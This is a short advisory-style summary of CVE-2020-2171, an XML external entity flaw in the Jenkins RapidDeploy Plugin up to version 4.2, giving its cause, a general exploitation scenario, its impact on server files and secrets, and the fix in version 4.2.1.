CVE-2020-2171

Vulnerability

Analysis

Jenkins RapidDeploy Plugin versions 4.2 and earlier do not configure its XML parser to prevent XML external entity (XXE) attacks [1][2]. This means the plugin's XML parser processes external entities defined in XML documents, which is a well-known security weakness. The root cause is the lack of secure parser settings to disable external entity resolution.

Exploitation

An attacker can exploit this by supplying a crafted XML payload that references external entities, either through a job configuration or a build parameter processed by the plugin. No prior authentication is required if the attacker can submit XML data to the Jenkins instance. The attack vector can be as simple as including a malicious XML file in a project or build step that the plugin parses.

Impact

Successful exploitation allows an attacker to read arbitrary files from the Jenkins server's filesystem, including sensitive files such as credentials, configuration files, and secret keys. In some scenarios, the attacker might also perform server-side request forgery (SSRF) or cause a denial of service. This could lead to full compromise of the Jenkins instance and exposure of Jenkins-managed secrets.

Mitigation

The vulnerability is fixed in RapidDeploy Plugin version 4.2.1 [2]. Users must update to this version promptly. There is no workaround mentioned in the advisories. The CVE is not listed on the CISA Known Exploited Vulnerabilities Catalog.